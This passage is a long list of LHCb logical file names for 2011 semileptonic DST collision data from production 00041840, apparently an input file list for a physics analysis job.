'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038639_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047221_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001463_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004593_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059445_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024855_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044533_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001880_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068699_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061886_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048901_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021056_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005541_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022742_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030771_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005127_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035429_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069019_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018789_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026835_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008885_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024541_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012499_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051748_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001604_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027089_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016879_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046963_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060592_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063286_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055945_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051215_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035243_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050574_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042935_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056585_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012430_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061375_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041077_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039680_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029858_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063893_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013148_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059441_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069006_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005999_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059083_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020915_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001319_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057254_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037538_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065377_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005595_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037058_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019569_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068367_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031104_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061895_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029138_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045341_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063434_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065781_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030593_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049291_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011683_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049714_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003254_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019939_1.semileptonic.dst',
